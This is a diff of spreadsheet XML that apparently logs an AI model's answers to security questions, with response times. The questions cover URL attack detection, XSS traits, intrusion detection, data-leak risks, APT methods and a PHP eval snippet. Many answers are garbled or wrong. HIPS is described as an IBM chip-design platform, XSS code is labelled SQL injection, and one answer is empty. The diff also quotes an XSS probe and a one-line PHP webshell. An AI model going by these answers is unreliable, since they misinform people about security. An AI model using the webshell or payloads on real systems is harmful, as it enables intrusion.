qr_qn=1&amp;qr_sn=25&amp;qr_f=1&amp;qr_id=1&amp;qr_did=1&amp;qr_ipp=1&amp;qr_q=11320000696785044&amp;qr_</f>
         <v/>
       </c>
       <c r="D60" t="n">
-        <v>23.67960166931152</v>
+        <v>47.08663654327393</v>
       </c>
     </row>
     <row r="61">
@@ -2089,24 +2152,14 @@
       </c>
       <c r="C61" t="inlineStr">
         <is>
-          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_code_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_code_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_start_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_end_date_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_creator_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_description_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_status_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_approve_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_reject_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_modify_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_delete_zh&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id_zh&amp;quot;:&amp;quot;729736&amp;quot;}
-这个url中使用了javascript的encodeURIComponent()方法进行了编码，以便在url中包含特殊字符。
-判断这是否是一个网络攻击吗？
-based on the provided URL, it appears to be a legitimate URL for a web service that is using encoded special characters to pass parameters in the URL.
-There are several encoded special characters in the URL, including:
-* `%` (escaped as `%25`)
-* `;` (escaped as `%3B`)
-* `?` (escaped as `%3F`)
-* `amp;` (escaped as `%26`)
-* `&lt;/` (escaped as `%3C`)
-* `&gt;` (escaped as `%3E`)
-These encoded special characters are commonly used in URLs to allow for the inclusion of special characters in the URL without breaking the URL syntax.
-Based on the provided URL alone, it does not appear to be a network attack. However, it is important to note that the URL could potentially be used in a network attack if it is used in conjunction with other malicious data or if it is used to access a vulnerable web application.
-It is always a good practice to verify the authenticity of URLs and to use secure communication protocols (such as HTTPS) to protect against potential network attacks.&lt;/s&gt;</t>
+          <t>&amp;#65533;&amp;#65533;&amp;#65533;&amp;#1041;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_level&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;plan_date&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;plan_person&amp;quot;:&amp;quot;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;#65533;&amp;quot;,&amp;quot;plan_content&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;task_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;action_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;check_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_time&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;task_update_time&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_update_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_id&amp;quot;:&amp;quot;A100&amp;quot;,&amp;quot;plan_id&amp;quot;:&amp;quot;729736&amp;quot;,&amp;quot;plan_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;plan_remark&amp;quot;:&amp;quot;&amp;quot;&amp;quot;,&amp;quot;action_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;action_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;action_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_id&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;check_name&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_type&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;check_remark&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_state&amp;quot;:&amp;quot;1&amp;quot;,&amp;quot;task_status&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_time&amp;quot;:&amp;quot;2023-05-08&amp;quot;,&amp;quot;task_update_time&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_create_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_update_user&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;task_remark&amp;quot;:&amp;quot;&amp;quot;&amp;quot;}
+这是一个JSON格式的数据，它包含了一个网络攻击的请求，包括一个恶意的 action id=1，这可能是一个跟踪或者黑客的攻击。
+请根据以下几点进行分析：
+1. 检查action id=1的具体值，是否为预期的值？如果不是，则</t>
         </is>
       </c>
       <c r="D61" t="n">
-        <v>19.8389093875885</v>
+        <v>29.26144742965698</v>
       </c>
     </row>
     <row r="62">
@@ -2121,16 +2174,13 @@
       </c>
       <c r="C62" t="inlineStr">
         <is>
-          <t>This is a URL that contains a suspicious script tag. When the user clicks on the link and visits the website, the script tag will be executed, potentially leading to a cross-site scripting (XSS) attack.
-Here are some reasons why this URL is suspicious:
-1. Unknown domain: The URL is pointing to a domain that is not known or trusted. This increases the risk of an XSS attack.
-2. Script tag: The script tag is not encapsulated in a proper HTML comment, which can make it vulnerable to XSS attacks.
-3. Unknown parameter: The URL contains an unknown parameter (id=1), which can be used to inject malicious code.
-To protect yourself from XSS attacks, you should avoid clicking on suspicious links or visiting untrusted websites. If you are unsure about the legitimacy of a website, you can check its security certificate or contact the website's administrator to verify its authenticity.&lt;/s&gt;</t>
+          <t>I'm not sure if this is a legitimate URL or not, but it appears to be an attempt at injecting malicious code into a website. The URL contains a query parameter "type" which is set to "3", and the value of the "id" parameter is "1". The script tag inside the URL contains the string "alert('xss')", which is likely an attempt to inject an XSS (Cross-Site Scripting) attack.
+It's important to be cautious when clicking on links or entering query parameters into a website, as they can potentially expose your system to malware or other security threats. If you did not intentionally click on this link or enter the query parameter, you may want to check your system for any potential malware or security threats.
+In general, it's a good idea to be cautious when encountering unfamiliar or suspicious URLs, and to avoid clicking on them or entering query parameters into them. If you're unsure about the legitimacy of a URL, you can use a URL scanning tool or check the website's security status using a tool like Google's Safe Browsing.&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D62" t="n">
-        <v>5.01775074005127</v>
+        <v>6.455928564071655</v>
       </c>
     </row>
     <row r="63">
@@ -2145,13 +2195,29 @@
       </c>
       <c r="C63" t="inlineStr">
         <is>
-          <t>Please note that this is just an example and it is not real. Do not attempt to access the URL provided as it may be harmful.
-The URL you provided is an example of a cross-site scripting (XSS) attack. It is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which can be executed by the user's browser. In this case, the script "alert('xss')" is injected into the website, which will be executed when the user views the page. This can lead to unauthorized data theft, user profiling, and other malicious activities.
-It is important to protect against XSS attacks by validating user input, sanitizing data, and using Content Security Policy (CSP) to define which scripts are allowed to run on a website. Additionally, using a web application firewall (WAF) and keeping software up to date can also help prevent XSS attacks.&lt;/s&gt;</t>
+          <t>在这个例子中，我们可以看到一个 Query String，它包含一个名为 "type" 的参数，以及一个叫做 "id" 的参数。当用户访问这个网站时，这个 Query String 将被送到服务器进行处理。
+现在，我们可以通过在服务器端添加一个特殊的字符串来利用这个弱点。例如，我们可以在服务器端的 encode.php 文件中添加以下代码：
+&lt;?php
+// 从 Query String 中提取 "type" 和 "id" 参数
+$type = $_GET["type"];
+$id = $_GET["id"];
+// 将 "type" 和 "id" 参数经过 HTML Entity 编码
+$type_encoded = htmlentities($type, ENT_QUOTES);
+$id_encoded = htmlentities($id, ENT_QUOTES);
+// 将 "type" 和 "id" 参数嵌入 JavaScript 脚本中
+$script = "alert('$type_encoded')";
+$script .= "alert('$id_encoded')";
+// 将脚本内容发送给客户端
+echo $script;
+?&gt;
+在上面的代码中，我们首先从 Query String 中提取 "type" 和 "id" 参数。然后，我们将这两个参数经过 HTML Entity 编码，以便在客户端上执行 JavaScript 脚本。最后，我们将脚本内容发送给客户端，以便在用户访问网站时执行。
+现在，当用户访问这个网站时，他们会收到两个警告。这是因为我们在服务器端添加了一个特殊的字符串，使得客户端执行 JavaScript 脚本。这个弱点可以被利用来攻击用户，例如，通过在脚本中发送 cookies，获取用户的个人信息等。
+因此，在实际应用中，你应该仔细 considre 和检查你的网站代码，以确保它们不会导致 security 问题。具体来说，你可以尝试使用 HTTPS 协议，以便在网络通信中使用 SSL/TLS 加密，从而防止攻击者 intercept 和读取你的网站数据。
+总之，这个例子只是一个简单的示例，以 illustratere  the concept of SQL injection attacks。在实际应用中，你需要更加严格地防范攻击者，以确保你的网站的安全性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D63" t="n">
-        <v>4.861932277679443</v>
+        <v>19.90721702575684</v>
       </c>
     </row>
     <row r="64">
@@ -2165,22 +2231,22 @@
       </c>
       <c r="C64" t="inlineStr">
         <is>
-          <t>XSS攻击可以有以下几个特征：
-1. 用户input：XSS攻击通常会使用用户输入，例如表单提交、URL参数、JavaScript脚本等。攻击者可以在用户输入中 inject 恶意代码，以便在用户上发送请求时执行这些代码。
-2. 不可靠的信任：XSS攻击可以利用不可靠的信任，例如不可靠的数据来源或不安全的 third-party 服务。攻击者可以利用这些不可靠的信任来在用户上执行攻击。
-3. 缓存攻击：XSS攻击可以利用缓存机制，例如缓存数据或缓存Cookies等。攻击者可以利用缓存机制来在用户上执行攻击。
-4. 跨域攻击：XSS攻击可以利用跨域请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
-5. 端到端攻击：XSS攻击可以利用端到端通信来执行攻击。例如，攻击者可以通过端到端通信来在用户端上执行攻击。
-6. 非授权访问：XSS攻击可以利用非授权访问来执行攻击。例如，攻击者可以通过非授权访问来访问用户数据或系统。
-7. 数据劫持：XSS攻击可以利用数据劫持来执行攻击。例如，攻击者可以通过数据劫持来获取用户数据或系统数据。
-8. 系统滥用：XSS攻击可以利用系统滥用来执行攻击。例如，攻击者可以通过系统滥用来获取系统权限或执行恶意操作。
-9. 缓存破坏：XSS攻击可以利用缓存破坏来执行攻击。例如，攻击者可以通过缓存破坏来破坏用户缓存或系统缓存。
-10. 跨站攻击：XSS攻击可以利用跨站请求来执行攻击。这种攻击可以在不同域名下发送请求，例如通过 redirect 到不安全的域名。
-总之，XSS攻击可以通过多种方式来执行攻击，因此需要严格验证用户输入和数据来防止攻击。&lt;/s&gt;</t>
+          <t>XSS攻击是一种常见的web应用安全漏洞，可以通过在web应用中嵌入恶意脚本来执行未经授权的操作。下面是XSS攻击的一些特征：
+1. 嵌入恶意脚本：XSS攻击者可以通过在web应用的输入fields中嵌入恶意脚本，例如在输入框中嵌入`&lt;script&gt;...&lt;/script&gt;`。
+2. 利用user input：XSS攻击者可以通过利用用户输入，例如username，password，或者其他用户输入，来嵌入恶意脚本。
+3. 细分攻击：XSS攻击者可以通过在多个位置嵌入恶意脚本，例如在页面上方、下方、或者在一个input框中。
+4. 动态脚本：XSS攻击者可以使用动态脚本，例如在page load时执行的脚本，或者在button click时执行的脚本。
+5. 非常的简单：XSS攻击可以非常简单，只需要在web应用的输入fields中嵌入一些恶意脚本，就能够执行非法操作。
+6. 隐蔽性：XSS攻击可以很隐蔽，只有在某些特定的情况下，例如在浏览器的console中，才能够检测到攻击。
+7. 细分攻击：XSS攻击者可以通过在多个位置嵌入恶意脚本，例如在页面上方、下方、或者在一个input框中。
+8. 自动执行：XSS攻击者可以使用javascript来自动执行恶意脚本，例如在page load时执行的脚本。
+9. 具有高危险性：XSS攻击可以具有很高的危险性，可以让攻击者获得特权、抓取数据、执行恶意操作等。
+10. 难以防御：XSS攻击可以难以防御，因为它可以通过利用用户输入，而不是直接攻击web应用。
+总之，XSS攻击是一种常见的web应用安全漏洞，可以通过嵌入恶意脚本来执行未经授权的操作。因此，应该按照安全 beste practices来防止XSS攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D64" t="n">
-        <v>21.04108595848083</v>
+        <v>20.97588515281677</v>
       </c>
     </row>
     <row r="65">
@@ -2194,20 +2260,19 @@
       </c>
       <c r="C65" t="inlineStr">
         <is>
-          <t>判断主机是否被入侵是一个非常重要的任务，以下是一些常用的方法：
-1. 监控主机的网络 траffics：使用网络监控工具，可以监控主机的网络 траffics，检查是否有不同于常规的网络活动，例如：检查网络流量的大小、包数量和类型，以及检查网络连接的数量和质量。
-2. 监控主机的系统级别：使用系统监控工具，可以监控主机的系统级别，检查是否有新的程序或服务被添加，或者是否有内存或处理器的占用率增加。
-3. 检查主机的系统 logs：检查主机的系统 logs，以查看是否有任何不当操作或错误操作。
-4. 使用安全软件：使用安全软件，例如安全防范软件、杀毒软件，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
-5. 使用网络检测软件：使用网络检测软件，例如网络检测软件，检查主机的网络连接和安全状态。
-6. 使用安全核心：使用安全核心，例如安全核心，检查主机的安全状态，检查是否有任何恶意软件或恶意程序。
-7. 使用域名服务器：使用域名服务器，例如域名服务器，检查主机的域名和 DNS 记录，以查看是否有任何不当操作或错误操作。
-8. 使用邮件服务器：使用邮件服务器，例如邮件服务器，检查主机的邮件服务器和邮件监控器，以查看是否有任何不当操作或错误操作。
-需要注意的是，这些方法不是一定可靠的，因为入侵者可能会隐藏他们的操作，或者使用恶意软件或恶意程序来隐藏他们的操作。因此，应该通过多种方法来监控和判断主机是否被入侵，以确保主机的安全。&lt;/s&gt;</t>
+          <t>在Network Security中，一个重要的任务是判断主机是否被入侵。这可以通过监控主机的网络活动，确定是否有恶意的网络流量或活动来完成。以下是一些常见的方法：
+1. 监控主机的网络流量：通过监控主机的网络流量，可以确定是否有恶意的网络流量或活动。例如，如果主机的网络流量异常增长，或者网络流量中存在恶意的文件或网络协议，这可能是入侵行为。
+2. 监控主机的系统运行时间：通过监控主机的系统运行时间，可以确定是否有恶意的程序或软件运行。如果主机的系统运行时间异常增长，或者系统运行时间中存在恶意的程序或软件，这可能是入侵行为。
+3. 监控主机的系统文件：通过监控主机的系统文件，可以确定是否有恶意的文件或目录在系统中。如果主机的系统文件中存在恶意的文件或目录，这可能是入侵行为。
+4. 监控主机的网络配置：通过监控主机的网络配置，可以确定是否有恶意的网络配置。如果主机的网络配置中存在恶意的网络设置，这可能是入侵行为。
+5. 使用入侵检测软件：可以使用入侵检测软件来监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些软件可以检测到入侵行为，并提供有用的信息来帮助你做出决策。
+6. 使用Network Monitoring Tools：Network Monitoring Tools可以帮助你监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些工具可以提供有用的信息，帮助你了解主机的网络活动，并做出相应的决策。
+7. 使用Intrusion Detection System（IDS）：IDS可以监控主机的网络活动，以确定是否有恶意的网络流量或活动。这些系统可以检测到入侵行为，并提供有用的信息来帮助你做出决策。
+需要注意的是，这些方法并不是一个完美的监控方式，因为入侵行为可能会使主机的网络活动异常增长，而不是实际上的入侵行为。因此，在实施这些方法时，需要注意这些限制。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D65" t="n">
-        <v>18.33541393280029</v>
+        <v>23.2702317237854</v>
       </c>
     </row>
     <row r="66">
@@ -2221,21 +2286,22 @@
       </c>
       <c r="C66" t="inlineStr">
         <is>
-          <t>数据泄露可能会导致的各种风险包括：
-1. 个人隐私泄露：数据泄露可能会导致个人的个人资料、姓名、地址、电话号码等隐私泄露，导致人们面临identity theft、诈骗、敏感資訊泄露等威胁。
-2. 经济损失：数据泄露可能会导致经济损失，包括客户信任损失、财富损失、误投资等。
-3. 重大灾难：数据泄露可能会导致重大灾难，例如：恶意破坏、恶意识识、恶意攻击等。
-4. 法律和行政问题：数据泄露可能会导致法律和行政问题，包括违反私隐保护法、违反数据保护法等。
-5. 社会影响：数据泄露可能会导致社会影响，包括社会信任危机、社会不稳定、社会不公正等。
-6. 媒体报导：数据泄露可能会导致媒体报导，包括社会名人泄露、著作权侵犯等。
-7. 客户敏感資訊泄露：数据泄露可能会导致客户敏感資訊泄露，包括财政資訊、个人資訊、醫療資訊等。
-8. 误投资：数据泄露可能会导致误投资，包括投资欺诈、投资损失等。
-9. 财务泄露：数据泄露可能会导致财务泄露，包括财务数据泄露、财务误投资等。
-10. 技术问题：数据泄露可能会导致技术问题，包括系统崩溃、数据损失、技术支持问题等。&lt;/s&gt;</t>
+          <t>数据泄露可能会导致多种风险和损失，以下是一些常见的风险：
+1. 个人隐私泄露：数据泄露可能会导致个人个人隐私和安全受到损害，例如邮件、地址、生日等个人信息可能会被泄露。
+2. 经济损失：数据泄露可能会导致经济损失，例如购物买或预订的详细信息、账户信息等可能会被泄露。
+3. 安全漏洞：数据泄露可能会导致安全漏洞，例如针对攻击者可以使用泄露的数据来破解安全措施，进而访问敏感信息。
+4. 骚扰和诋毁：数据泄露可能会导致骚扰和诋毁，例如邮件诋毁、恶意下载等。
+5. 法律和诉讼问题：数据泄露可能会导致法律和诉讼问题，例如隐私权、诉讼权等。
+6. 媒体和社会影响：数据泄露可能会导致媒体和社会影响，例如新闻报道、社会评论等。
+7. 系统安全和稳定问题：数据泄露可能会导致系统安全和稳定问题，例如系统崩溃、数据损失等。
+8. 反应时间和响应能力：数据泄露可能会导致反应时间和响应能力受到损害，例如不能及时地 реа应用或个人数据泄露等。
+9. 数据损失和破坏：数据泄露可能会导致数据损失和破坏，例如数据丢失、逻辑损失等。
+10. 系统快速追踪和识别：数据泄露可能会导致系统快速追踪和识别，例如使用泄露的数据来识别和追踪某个个人或组织。
+总之，数据泄露可能会导致多种风险和损失，因此需要采取强制性的安全措施，例如使用加密、安全协议、数据加密等，以防止数据泄露。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D66" t="n">
-        <v>18.89712333679199</v>
+        <v>23.01585340499878</v>
       </c>
     </row>
     <row r="67">
@@ -2249,20 +2315,11 @@
       </c>
       <c r="C67" t="inlineStr">
         <is>
-          <t>HIPS（Heterogeneous Integration Platform Services）是IBM的一个集成平台，用于快速整合多个技术领域的芯片设计。以下是一些HIPS产品的列表：
-1. HIPS Flow: 用于简化和快速整合芯片设计的Flow工具，包括HDL模型化、硬件拟合、验证和缓存分析等功能。
-2. HIPS Liberator: 用于快速整合芯片设计，包括RF、CMOS、BiCMOS和 Photonic 等多种技术领域的芯片设计。
-3. HIPS Explorer: 用于探索和分析芯片设计，包括芯片结构、硬件拟合、验证和缓存分析等功能。
-4. HIPS Modeler: 用于模拟和分析芯片设计，包括HDL模型化、硬件拟合和验证等功能。
-5. HIPS Emulator: 用于模拟和验证芯片设计，包括芯片模拟、验证和缓存分析等功能。
-6. HIPS Optimizer: 用于优化芯片设计，包括硬件拟合、验证和缓存分析等功能。
-7. HIPS Analyzer: 用于分析芯片设计，包括硬件拟合、验证和缓存分析等功能。
-8. HIPS Debugger: 用于调试芯片设计，包括硬件拟合、验证和缓存分析等功能。
-这些产品可以帮助开发者快速整合多个技术领域的芯片设计，提高设计效率和质量。&lt;/s&gt;</t>
+          <t>&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D67" t="n">
-        <v>14.71840834617615</v>
+        <v>0.2782504558563232</v>
       </c>
     </row>
     <row r="68">
@@ -2276,23 +2333,35 @@
       </c>
       <c r="C68" t="inlineStr">
         <is>
-          <t>如何划分网络区域才能更安全？
-划分网络区域是指将网络分成不同的区域，以便对每个区域进行更加精细的安全控制。这种方法可以帮助网络管理者更好地防范攻击和维护网络的安全。
-以下是一些可能有用的划分网络区域的方法：
-1. 根据网络资源的分类：将网络分成不同的资源类别，例如客户端、服务器、数据库和网络设备等。对每个资源类别进行安全检查和策略定制。
-2. 根据网络服务的分类：将网络分成不同的服务类别，例如web服务、电子邮件服务、协议服务等。对每个服务类别进行安全检查和策略定制。
-3. 根据网络用途的分类：将网络分成不同的用途类别，例如企业网络、学习网络、个人网络等。对每个用途类别进行安全检查和策略定制。
-4. 根据网络连接的分类：将网络分成不同的连接类别，例如内网连接、外网连接、虚拟专用网络等。对每个连接类别进行安全检查和策略定制。
-5. 根据网络设备的分类：将网络设备分成不同的类别，例如路由器、交换机、firewall等。对每个设备类别进行安全检查和策略定制。
-6. 根据网络流量的分类：将网络流量分成不同的类别，例如网络应用流量、数据流量、VOIP流量等。对每个流量类别进行安全检查和策略定制。
-7. 根据网络攻击的分类：将网络攻击分成不同的类别，例如黑客攻击、恶意软件攻击、网络泄露等。对每个攻击类别进行安全检查和策略定制。
-8. 根据网络资源的易访问程度的分类：将网络资源分成不同的易访问程度类别，例如内部资源、外部资源、公共资源等。对每个资源类别进行安全检查和策略定制。
-9. 根据网络资源的敏感程度的分类：将网络资源分成不同的敏感程度类别，例如高敏感资源、中敏感资源、低敏感资源等。对每个资源类别进行安全检查和策略定制。
-10. 根据网络资源的</t>
+          <t>分配网络区域是一个重要的网络安全措施，可以帮助避免网络攻击和数据丢失。以下是一些建议，可以帮助你更好地划分网络区域：
+1. 了解您的网络环境：
+	* 了解您的网络设备和服务的位置和功能。
+	* 了解您的网络需求和冲突。
+2. 将网络分为几个区域：
+	* 根据网络设备和服务的位置和功能，将网络分为不同的区域。
+	* 例如，可以将网络分为虚拟 Local Area Network（VLAN），每个VLAN可以包含几个网络设备和服务。
+3. 对每个区域进行安全配置：
+	* 对每个区域进行安全配置，例如，设置防火墙规则和安全策略。
+	* 确保每个区域的网络设备和服务都具有相应的安全措施。
+4. 实施访问控制：
+	* 实施访问控制，例如，限制访问某些网络设备或服务。
+	* 使用身份验证和授权机制来确保只有授权的人能够访问网络设备和服务。
+5. 实施网络segments：
+	* 将网络分为多个segments，每个segment可以包含几个网络设备和服务。
+	* 使用虚拟路由器将每个segment连接到不同的网络段。
+6. 实施虚拟化技术：
+	* 使用虚拟化技术，例如，虚拟机（VM）和虚拟化硬件（VDI），可以在多个网络 segment 中分配资源。
+7. 实施网络监控和管理：
+	* 实施网络监控和管理系统，例如，使用监控工具来监控网络流量和活动。
+	* 使用诊断工具来诊断网络问题和攻击。
+8. 实施备份和恢复策略：
+	* 实施备份和恢复策略，例如，使用备份软件和服务来备份数据。
+	* 确保备份和恢复策略能够适应不同的网络 segment 的需求。
+总之，将网络分为几个区域，对每个区域进行安全配置，实施访问控制，实施网络segments，使用虚拟化技术，实施网络监控和管理，以及实施备份和恢复策略，都是一些重要的措施，可以帮助您更好地划分网络区域，从而提高网络的安全性和可靠性。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D68" t="n">
-        <v>24.38762617111206</v>
+        <v>27.27874374389648</v>
       </c>
     </row>
     <row r="69">
@@ -2306,23 +2375,20 @@
       </c>
       <c r="C69" t="inlineStr">
         <is>
-          <t>Apt是一个指代高级恶意软件（Advanced Persistent Threat）的术语，apt组织通常会采用哪些攻击手段？
-Apt组织通常采用以下攻击手段：
-1.  socially engineered phishing attacks：钓鱼式攻击，通过电子邮件、 instant messaging 或社交媒体等渠道诱惑用户提供敏感信息，例如帐户名称和密码。
-2.  Malware infection：恶意软件感染，通过攻击者在用户计算机上传输的恶意软件，攻击者可以通过访问计算机和网络进行快速扩展和扩张。
-3.  Lateral movement：side-channel attacks，通过访问与攻击者关联的计算机或网络，以实现快速扩展和扩张。
-4.  Privilege escalation：升级权限，通过利用漏洞或恶意软件来升级用户帐户的权限，以实现访问控制和数据泄露。
-5.  Data exfiltration：数据泄露，通过将敏感数据从攻击者的计算机或网络 transferred to a remote location，以实现数据泄露。
-6.  Command and control：指令和控制，通过将攻击者的计算机或网络与攻击目标的计算机或网络相连，以实现控制和监控。
-7.  Denial of Service：屏蔽服务，通过屏蔽或攻击攻击目标的网络或服务，以阻断或减轻攻击目标的访问和服务。
-8.  Web application attacks：攻击Web应用程序，通过攻击Web应用程序的漏洞或欺购Web应用程序的权限，以实现攻击目标。
-9.  Cloud attacks：攻击云计算环境，通过利用云计算环境中的漏洞或欺购云计算环境的权限，以实现攻击目标。
-10.  Mobile device attacks：攻击移动设备，通过利用移动设备的漏洞或欺购移动设备的权限，以实现攻击目标。
-这些攻击手段可能会变化或受到更新，因此需要定期审查和缓存最新的攻击手段。&lt;/s&gt;</t>
+          <t>Apt是一个通用的术语，指的是特定目标的敏捷、隐蔽、高级别的攻击手段。通常情况下，apt组织会采用以下几种攻击手段：
+1. 后台攻击：apt组织通常会在受害者的后台（如磁盘、文件系统等）进行攻击，通过找到和修改重要文件来破坏受害者的系统或数据。
+2. 远程攻击：apt组织可能会利用远程攻击方式来攻击受害者，通过远程访问受害者的系统，通过网络攻击或其他方式获得访问权限。
+3. 社交 engineering：apt组织可能会利用社交工具（如社交媒体、电子邮件等）来攻击受害者，通过滥用社交工具，找到受害者的个人信息，然后使用这些信息进行攻击。
+4. 软件攻击：apt组织可能会利用软件攻击方式来攻击受害者，通过找到和修改软件，以更改它们的行为，或者通过找到和删除软件来破坏受害者的系统。
+5. 网络攻击：apt组织可能会利用网络攻击方式来攻击受害者，通过网络攻击，找到受害者的系统，然后进行攻击。
+6. 文件攻击：apt组织可能会利用文件攻击方式来攻击受害者，通过找到和修改文件，以更改它们的内容，或者通过找到和删除文件来破坏受害者的系统。
+7. 应用程序攻击：apt组织可能会利用应用程序攻击方式来攻击受害者，通过找到和修改应用程序，以更改它们的行为，或者通过找到和删除应用程序来破坏受害者的系统。
+8. 系统攻击：apt组织可能会利用系统攻击方式来攻击受害者，通过找到和修改系统文件，以更改它们的行为，或者通过找到和删除系统文件来破坏受害者的系统。
+需要注意的是，apt组织的攻击手段可能会变化，因此，受害者需要不断地做好防范。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D69" t="n">
-        <v>19.66598010063171</v>
+        <v>22.96895551681519</v>
       </c>
     </row>
     <row r="70">
@@ -2337,14 +2403,14 @@
       </c>
       <c r="C70" t="inlineStr">
         <is>
-          <t>This code is dangerous because it allows an attacker to execute any PHP code by sending a specially crafted request to the server. The `@` symbol in the `eval()` function is used to suppress errors, which means that any errors that occur during the evaluation of the code will be silently ignored. This can lead to unexpected behavior, including the execution of malicious code.
-In this example, the code `&lt;?php @eval('caidao');?&gt;` is executed without any checks or validation, which means that an attacker could potentially send a request that evaluates to any PHP code, including malicious code. This could allow the attacker to gain control of the server, steal sensitive information, or carry out other malicious actions.
-To avoid this type of attack, it is important to properly validate and sanitize any user input before executing it as PHP code. This can be done using a variety of techniques, including input validation, output encoding, and using safe modes.
-In general, it is never a good idea to use `eval()` functions in a production environment, as they can introduce significant security risks. If you need to execute dynamic code, there are safer alternatives available, such as using a PHP interpreter or a web application firewall.&lt;/s&gt;</t>
+          <t>这段内容可能会导致PHP执行敏感操作，这可能会导致安全问题。
+在PHP中， eval()函数用于evaluatestring，它会将指定的字符串解析成PHP代码，并执行其中的语句。如果 eval()函数的 inputs 不是可靠的，那么它可能会导致敏感操作。
+在这个例子中，我们使用了 @ 符号，将 eval() 函数的输入视为可信的。但是，这并不是一个安全的做法，因为eval()函数的输入可以是任何的字符串，包括恶意的代码。
+因此，在实际应用中，你应该避免使用 eval() 函数来执行来自用户或其他外部来源的代码。相反，你可以使用其他的方式，如input validation、data encryption、Content Security Policy等，来保护你的应用程序免受攻击。&lt;/s&gt;</t>
         </is>
       </c>
       <c r="D70" t="n">
-        <v>6.293869495391846</v>
+        <v>7.841360092163086</v>
       </c>
     </row>
     <row r="71">
@@ -2359,17 +2425,61 @@
       </c>
       <c r="C71" t="inlineStr">
         <is>
-          <t>comment:
-这段base64编码的内容看上去危险吗？
+          <t>这个base64编码的内容是什么？
